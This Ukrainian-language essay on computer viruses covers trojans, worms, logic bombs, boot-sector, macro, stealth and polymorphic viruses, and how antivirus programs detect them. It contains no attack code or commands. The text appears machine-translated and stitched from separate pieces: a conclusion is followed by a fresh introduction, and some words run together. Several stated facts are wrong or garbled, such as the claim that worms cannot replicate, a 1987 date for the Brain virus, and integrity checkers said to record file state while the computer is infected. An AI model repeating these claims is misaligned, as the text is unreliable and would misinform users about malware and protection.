Нарешті, найефективніший (але при цьому - найнезручніший з погляду користувача) метод - «Білий список». Суть його - у складанні користувачем списку «довірених» програми, які можуть запускатися на комп'ютері, що захищається. Всі інші програми повністю блокуватимуться антивірусом. Такий метод, втім, частіше реалізується не в антивірусах, а в брендмауерах («захисних екранах»), оскільки сам він не може гарантувати «чистоту» програм (користувач сам того не знаючи може внести в список вже заражену програму).
Як правило, антивірусні програми використовують різноманітні комбінації описаних методів. Головна проблема розробників антивірусів у даному випадку – домогтися оптимального співвідношення ефективності виявлення загроз та продуктивності програми. Деякі розробники покладають цю турботу на плечі користувачів, пропонуючи їм самостійно вибрати необхідні алгоритми, а також настроїти рівень їхньої «підозрілості».

Висновок
Ми розповіли про всі аспекти «життя» комп'ютерних вірусів, які цікавлять пересічних користувачів. На закінчення підіб'ємо короткі підсумки.
Отже, вірус- це програма, що виконує руйнівні дії та здатна до розмноження. Віруси відрізняються за способами розповсюдження, проникнення на комп'ютери користувачів, алгоритмами роботи та типом деструктивних дій.
Віруси можуть жити самостійно, ім'я окреме «тіло»-файл, або ж «прикріплюватися» до програм та документів користувача. Більшість вірусів «живе» у файлах (*.exe, *.dll та інших) або документах, які можуть містити макроси. Однак теоретично вірус може бути укладений у будь-який файл, що обробляється вразливою програмою. "Помиляючись" така програма запускає на виконання код із самого невинного файлу (скажімо, картинки).
Комп'ютерні віруси можуть розмножуватися шляхом копіювання власного тіла або за допомогою передачі свого коду через комп'ютерні мережі.
Також варто пам'ятати, що створення та поширення комп'ютерних вірусів та шкідливих програм переслідується в Росії за законом (глава 28, стаття 273 Кримінального Кодексу РФ).

Кожна людина, що має справу з комп'ютерами, безсумнівно, багато разів зустрічалася з поняттям "вірус", "троян", "троянський кінь" тощо, раніше ще в докомп'ютерну еру, що вживалися виключно в медико-біологічних та історичних дослідженнях. Цими словами позначають деякий різновид програм, якими часто лякають недосвідчених користувачів, розписуючи їхню непереборну силу, здатну зруйнувати в комп'ютері все, аж до механічної конструкції жорсткого диска.

Комп'ютерний вірусє зловмисною комп'ютерною програмою, в якій міститься частина коду, що виконується після запуску вірусу в комп'ютерній системі. Під час роботи вірус заражає інші програми копіями себе.

Ефект дії вірусуможе змінюватись від легкого роздратування користувача до повного знищення всіх даних у системі. Однак деякі віруси можуть реплікувати себе і поширюватися в інші системи. Це ускладнює локалізацію вірусів та захист від них. Щоб написати простий вірус, достатньо запровадити кілька рядків програмного коду.

Віруси можна передавати п про лінії зв'язку або поширювати на інфікованих носіях. Це ускладнює локалізацію автора вірусу. Деякі віруси можуть ховатися в інших програмах або проникати в операційну систему комп'ютера.

Вірусним атакам уразливі всі комп'ютерні операційні системиОднак деякі з них більш уразливі, ніж інші. Віруси нерідко ховаються в нової комп'ютерної гри, яку можна завантажити в Інтернеті. Крім того, віруси можна виявити в макросах, що використовуються в офісних інформаційних системах, або в компонентах сторінок Web, що завантажуються з Інтернету. Шляхи влучення вірусів у комп'ютери різні, але загальне в них одне - віруси входять до комп'ютерних систем тільки із зовнішніх джерел.

Як тільки вірус входить у систему, він може розпочати свою руйнівну діяльність відразу, або ж вірус може очікувати активації якоюсь подією, наприклад, отриманням певних даних або настанням заданої дати чи часу. Відомі кілька різних форм вірусів, які можуть вторгнутися у комп'ютерну систему

Троянський кіньє комп'ютерною програмою, яка маскується або ховається в частині програми. На відміну від інших вірусів, троянці не реплікують себе в системі. Деякі форми троянських коней може бути запрограмовані на саморуйнування і залишають жодних слідів, крім заподіяних ними руйнувань. Деякі хакери використовують троянських коней для отримання паролів та відсилання їх назад хакеру. Крім того, вони можуть використовуватися для банківських шахрайств, коли невеликі суми грошей знімаються із законних рахунків та передаються на секретний рахунок.

Черв'якиє програмами, які руйнують комп'ютерну систему. Вони можуть проникати в програми обробки даних та замінювати або руйнувати дані. Хробаки подібні до троянських коней у тому відношенні, що не можуть реплікувати самих себе. Однак, як віруси, вони можуть спричиняти великі руйнування, якщо їх не виявити вчасно. Набагато простіше ліквідувати хробака чи троянського коня, якщо існує лише єдина копія програми-руйнівника.

Логічні бомбиподібні до програм, що використовуються для троянських коней. Проте логічні бомби мають таймер, який підриває їх у задану дату та час. Наприклад, вірус Michelangeloмає тригер, встановлений на день народження знаменитого художника Мікеланджело – 6 березня. Логічні бомби часто використовуються незадоволеними службовцями, які можуть встановити їх активацію після того, як вони залишать компанію. Наприклад, логічна бомба може "вибухнути", коли ім'я цього службовця виключається з платіжної відомості. Завдяки вбудованому механізму затримки логічні бомби активно використовуються для шантажу. Наприклад, шантажист може надіслати повідомлення, яке говорить, що якщо йому буде виплачено певну суму грошей, він надасть інструкцію для відключення логічної бомби.

Історія зародженнявірусів досить туманна, так само як і цілі, які переслідують їхні розробники. У комп'ютерних книгах стверджується, що першим відомим вірусом була програма, що реалізує модель Всесвіту, в якій мешкали деякі істоти, які вміють рухатися, шукати і поїдати їжу, а також розмножуватися та вмирати з голоду. З погляду авторів книги, програми-віруси є результатом суто наукових досліджень у галузі створення деяких штучних організмів, здатних до самостійного існування, на зразок живих істот. Це підкреслює і назва програм, розроблених виходячи з таких досліджень - віруси, тобто. щось живе, здатне до розмноження, мутації та самовиживання. Треба розуміти, що творців комп'ютерних вірусів нам пропонується віднести до розряду невинних диваків, зайнятих винятково відірваними від реального життя науковими проблемами.

Ми не заглиблюватимемося в полеміку з цього приводу, зазначивши тільки, що перша програма, яка справді могла претендувати на звання вірусу, з'явилася в 1987 року, і це був Пакистанський вірус, розроблений братами Амджатом та Базі том Алві (Amdjat та Bazit Alvi). Їхньою метою було покарати (!) громадян США за купівлю в Пакистані дешевих копій програм. Далі кількість вірусів стала зростати з лавиноподібною швидкістю, а збитки від появи в комп'ютерах стали обчислюватися мільйонами і сотнями мільйонів доларів. Зараження комп'ютерів вірусами різної природи набуло характеру епідемії і зажадало вжиття заходів захисту, в тому числі й юридичних. Розглянемо, як ці шкідливі створіння, віруси, потрапляють у комп'ютерні системи.

Шляхи проникнення вірусів можуть бути найрізноманітнішими. Віруси потрапляють у вашу комп'ютерну систему з безлічі різноманітних джерел, програм, програм і файлів, що передаються вам колегами, програмного забезпечення, що купується в архівованій формі. Давайте розглянемо структуру, що використовується для зберігання даних на гнучких дискахДля виявлення місць, функціонально придатних для прихованого існування вірусів. Гнучкі диски можуть зберігати файли даних, програм та програмне забезпечення операційних систем. Вони служать загальноприйнятим посередником передачі файлів даних. Гнучкий диск складається із завантажувального сектора та даних. У разі потреби в завантажувальному секторі може зберігатися інформація, потрібна для завантаження комп'ютера. Крім того, тут зберігається інформація про розділи, інформація з управління завантаженням та інформація про розміщення файлів. Дані є всю змістовну інформацію, яка зберігається на гнучкому диску. Улюбленим місцем проживання вірусів є завантажувальні сектори та виконувані файли, що зберігаються на гнучкому диску. Поміщені в завантажувальному секторі віруси можуть запускатися під час завантаження системи з дискети. Віруси, поміщені у виконувані файли, запускаються разом із зараженою програмою, після чого розпочинають свою діяльність у комп'ютерній системі.

Ті самі можливості перенесення вірусів забезпечують компакт-диски, що нині стали основним засобом перенесення файлів та інформації між комп'ютерами. У компакт-дисках міститься двійкова цифрова інформація, яка записується на диск шляхом створення мікроскопічних ямок на поверхні диска. Інформація зчитується при проході диском променя світла, що генерується лазером. Компакт-диски подібні до гнучких дисків у тому відношенні, що для зберігання даних в них також використовується структура, що складається з завантажувального сектора і даних.

Інтернет надав користувачам нові можливості встановлення зв'язку, які збільшують потенційну небезпеку проріх у системі захисту від вірусів. Технології Web, наприклад, для створення аплетів Java і ActiveX, полегшують користувачам взаємодію по Інтернету, але, з іншого боку, є зручним засобом для поширення зловмисного програмного забезпечення. Користувачі робочої станції, встановленій на комп'ютері, для виконання своїх завдань використовують програмне забезпечення та файли даних. Вся ця інформація, включаючи операційну систему, зберігається на жорсткому диску комп'ютера. Іншим місцем постійного зберігання інформації, необхідної для роботи, є енергонезалежна пам'ять CMOS, що зберігає базову систему введення/виводу (BIOS) комп'ютера; процедури BIOS використовуються при завантаженні системи, так що їх зараження є серйозною небезпекою, незважаючи на невеликі розміри CMOS. Таким чином, в комп'ютері є два основні місця, здатні постійно зберігати та оновлювати інформацію - жорсткий диск та пам'ять CMOS. Ці компоненти комп'ютерної системи є тим місцем, куди найчастіше потрапляють віруси при інфікуванні комп'ютера. Улюбленим місцем проживання вірусів є жорсткий диск. Жорсткий диск складається з таких елементів. Таблиця розділів, яка використовується для відстеження розділів та структури диска. Завантажувальний сектор, що вказує на завантажувач системи, де слід шукати перший файл, необхідний для запуску операційної системи. . Перша таблиця FAT зберігає запис, що вказує, як пов'язані всі інші записи області диска, призначеної зберігання даних. . Друга таблиця FAT, що є резервну копію першої таблиці FAT, у разі пошкодження першої таблиці. . Діагностичний циліндр, який використовується для відстеження помилок чи локалізації проблем у частині обладнання чи програми. Він доступний лише жорсткому диску для вирішення внутрішніх завдань. Найчастіше віруси ховаються в завантажувальних секторах, що дозволяє впливати на завантаження системи (див. наступний розділ). Інше улюблене місце - файли, що виконуються. У виконувані файли входять такі елементи. Заголовок, що інформує операційну систему про тип файлу і вказує, чи призначений він для роботи з поточною операційною системою. Крім того, заголовок надає іншу інформацію, яка може знадобитися операційній системі, наприклад обсяг пам'яті, необхідний для відкриття файлу, Заголовок займає певну область, яка може розділяти різні частини файлу. Нижній колонтитул, який інформує операційну систему комп'ютера про досягнення кінця файлу. Крім того, він інформує комп'ютер, що він повинен робити після досягнення кінця файлу. Файл може бути доповнений незначною інформацією, щоб дані, записані на диск, заповнювали певний простір. Доповнення файлу, що виконується, не містить жодної інформації. Наприклад, файл, що містить 500 байт коду, може бути записаний в блоці розміром 512 байт з доповненням 12 байтів одиницями. При зараженні виконуваного файлу вірус замінює виконуваний код програми власним кодом. При запуску програми запускається код вірусу, виконуючи різні дії замість тих, які має виконувати програма. Місце проживання вірусу пов'язане з його функціонуванням безпосередньо (як і у справжніх живих вірусів). Вірусні атаки можна навіть класифікувати за місцем розташування в комп'ютері.

Типи вірусних атак

Відомі три основні типи вірусних атак.

• Атака завантажувального сектора.
• Інфікування файлу.
• Атака із застосуванням макросів.

Віруси завантажувального сектораінфікують завантажувальний сектор або головний завантажувальний запис комп'ютерної системи. Коли комп'ютер завантажується, програма вірусу активується. Віруси завантажувального сектора насамперед переміщують в інше місце або перезаписують вихідний завантажувальний код і заміщають його інфікованим завантажувальним кодом. Інформація вихідного сектора завантаження переноситься на інший сектор диска, який позначається як дефектна область диска і далі не використовується. Оскільки завантажувальний сектор - перший елемент, що завантажується під час запуску комп'ютера, виявлення вірусів завантажувального сектора може бути нелегким завданням. Віруси завантажувального сектора – один із найпопулярніших типів вірусів. Вони можуть поширюватися за допомогою інфікованих гнучких дисків під час завантаження комп'ютера. Це може легко статися, якщо при перезавантаженні комп'ютера гнучкий диск вставлений в дисковод.

Віруси, що інфікують файли, вражають виконувані файли. Вони можуть активуватися лише під час виконання файлу. Найчастіше уражаються файли типів СОМ, ЕХЕ, DLL, DRV, BIN, SYS та VXD. Віруси, що інфікують файли, можуть ставати резидентними і приєднуватися до інших програм, що виконуються. Віруси, що інфікують файли, зазвичай замінюють інструкції завантаження програми виконуваного файлу своїми власними інструкціями. Потім вони переносять початкову інструкцію завантаження програми до іншого розділу файлу. Цей процес збільшує розмір файлу, що допоможе виявити вірус.

Віруси, в основі яких лежать макроси. макровіруси), виконують непередбачені дії шляхом використання макромови додатка для свого розповсюдження в інші документи. Вони можуть, наприклад, інфікувати файли.DOT та.DOC програми Microsoft Word, а також файли Microsoft Excel.

Ці віруси відносяться до міжплатформнимвірусів можуть інфікувати як системи Macintosh, так і PC.

Інші віруси можуть мати риси одного або кількох описаних вище типів.

* Віруси-невидимки (жаргонна назва - "стелс-віруси") під час роботи намагаються сховатися як від операційної системи, так і антивірусних програм. Щоб перехопити всі спроби використання операційної системи, вірус має бути у пам'яті. Віруси невидимки можуть приховувати всі зміни, які вони вносять до розмірів файлів, структури каталогів або інших розділів операційної системи. Це значно ускладнює їхнє виявлення. Щоб блокувати віруси-невидимки, їх слід виявити, коли вони перебувають у пам'яті.

* Зашифровані віруси під час роботи шифрують свій вірусний код, що дозволяє їм запобігти виявленню та розпізнанню вірусу.

* Поліморфні віруси можуть змінювати свій зовнішній вигляд при кожному інфікуванні. Для зміни зовнішнього вигляду та утруднення виявлення вони використовують механізми мутацій. Поліморфні віруси здатні набувати понад два мільярди різних форм, оскільки при кожному інфікуванні змінюють алгоритм шифрування. Багатокомпонентні віруси інфікують як завантажувальні сектори, і виконувані файли. Це один із найскладніших для виявлення вірусів, оскільки багатокомпонентні віруси можуть поєднувати деякі або всі методи приховування своєї діяльності, притаманні вірусам-невидимкам та поліморфним вірусам.

* Самооновлювальні віруси, які з'явилися останнім часом, здатні потай оновлюватися через Інтернет під час сеансів зв'язку.

Зустріч комп'ютера з вірусом тягне за собою кілька наслідків.

* Поява незвичайних системних повідомлень.

* Зникнення файлів або збільшення їх розмірів.

* Уповільнення роботи системи.

* Раптовий недолік дискового простору.

* Диск стає недоступним.

Антивірусні програми Важливий метод захисту від вірусів – розгортання антивірусних програм. Антивірусна програма має виконувати три основні завдання.

* Виявлення вірусу.

* Видалення вірусу.

* Превентивний захист.

Щоб запобігти вірусній атакі, антивірусна програма реалізує безліч різних методів виявлення. Різні антивірусні програми використовують деякі або всі методи наступної групи.

* Сканування цифрової сигнатури використовується для визначення унікального цифрового коду вірусу. Цифрова сигнатура є попередньо встановленим шістнадцятковим кодом, наявність якого у файлі свідчить про зараження вірусом. Сканування цифрової сигнатури є найуспішнішим методом ідентифікації вірусів. Він, однак, повністю залежить від підтримки бази даних із цифровими сигнатурами вірусів і тонкощів механізму сканування. Можливе помилкове виявлення вірусу у непошкодженому файлі.

* Евристичний аналіз (або сканування за заданими правилами) виконується швидше, ніж сканування більшістю традиційних методів. Цей метод використовує набір правил ефективного аналізу файлів і швидко виявляє підозрілий вірусний код. Як зазначено, всі евристичні методи у тій чи іншій формі виконують емулювання виконання коду вірусу. Тому, за наявності певного досвіду, розробник вірусу може захистити свій "виріб" від виявлення евристичним аналізом. Евристичний аналіз схильний до помилкових тривог, і, на жаль, залежить від коректності набору правил виявлення вірусу, які постійно змінюються.

* Дослідження пам'яті - ще один метод, який зазвичай успішно застосовується для виявлення вірусів. Він залежить від розпізнавання розташування відомих вірусів та їх кодів, коли вони знаходяться у пам'яті. І хоча дослідження пам'яті зазвичай призводить до успіху, використання такого методу може вимагати значних ресурсів комп'ютера. З іншого боку, може втручатися у нормальний хід виконання операцій комп'ютера.

* Моніторинг переривань працює шляхом локалізації та запобігання вірусним атакам, що використовують виклики переривань. Виклики переривань є запитами різних функцій через системні переривання. Моніторинг переривань, подібно до дослідження пам'яті, також може відвернути значні системні ресурси. Він може стати причиною проблем при легальних системних викликах та уповільнити роботу системи. Через велику кількість вірусів і легальних системних викликів, моніторинг переривань може відчувати труднощі у локалізації вірусів.

* Контроль цілісності (відомий також як обчислення контрольних сум) переглядає характеристики файлів програм і визначає, чи модифіковані вони вірусним кодом. Цей метод не потребує оновлення програмного забезпечення, оскільки це не залежить від цифрових підписів вірусів. Однак він вимагає від вас підтримки бази даних контрольних сум файлів, вільних від вірусів. Контроль цілісності не здатний виявляти пасивні та активні віруси-невидимки. Крім того, він не може ідентифікувати виявлені віруси за іменами чи типами. Якщо антивірусна програма є резидентною, вона контролює віруси безперервно. Це традиційна міра захисту файлових серверів, оскільки кожен файл при використанні повинен пройти перевірку. Безперервний контроль може бути невідповідним засобом для клієнтської машини, оскільки може призвести до обробки надто великого обсягу інформації, а це уповільнює роботу комп'ютера. На клієнтській машині краще конфігурувати антивірусну програму на запуск у певний час. Наприклад, вона може запускатися під час завантаження комп'ютера або зчитування нового файлу з гнучкого диска. У деяких пакетах (у тому числі, що описані нижче Norton AntiVirus і MacAfee VirusScan) використовують метод, відомий як сканування за розкладом, для пошуку вірусів на жорсткому диску в задані періоди часу. Ще один метод полягає у використанні антивірусної програми під час простою комп'ютера. Наприклад, його можна використовувати як частину програми заставки.

Типи антивірусних засобів.

1. Програми - детектори виявляють файли, заражені одним із відомих вірусів, такі програми в чистому вигляді нині рідкісні.

2. Фаги чи програми - лікарі, і навіть програми - вакцини як знаходять заражені вірусами файли, а й «лікують» їх, тобто. видаляють із файлу тіло програми вірусу, відновлюючи програму в тому стані, в якому вона перебувала до зараження вірусом. На початку своєї роботи фаги шукають віруси в оперативній пам'яті, знищуючи їх і лише потім переходять до «лікування» файлів. Поліфаги – знищують велику кількість вірусів. Aidstest, Scan, Norton AntiVirus, Doctor Web.

3. Програми- ревізори відносяться до найнадійніших засобів захисту від вірусів. Ревізори запам'ятовують вихідний стан програм, тоді, коли комп'ютер ще заражений вірусом, а потім періодично порівнюють поточний стан файлу з вихідним. Якщо виявлено зміни, на екрані дисплея відображаються повідомлення. ADinf.

4. Програми – фільтри або «сторожі» – невеликі резидентні програми, що постійно перебувають у пам'яті комп'ютера. Вони контролюють операції комп'ютера і виявляють підозрілі дії під час роботи комп'ютера, притаманних вірусів. При спробі будь-якої програми зробити зазначені дії «сторож» надсилає повідомлення, а користувач може заборонити або дозволити виконання відповідної операції. Програми фільтри дозволяють виявити вірус на ранній стадії його існування, але вони не лікують файли і диски.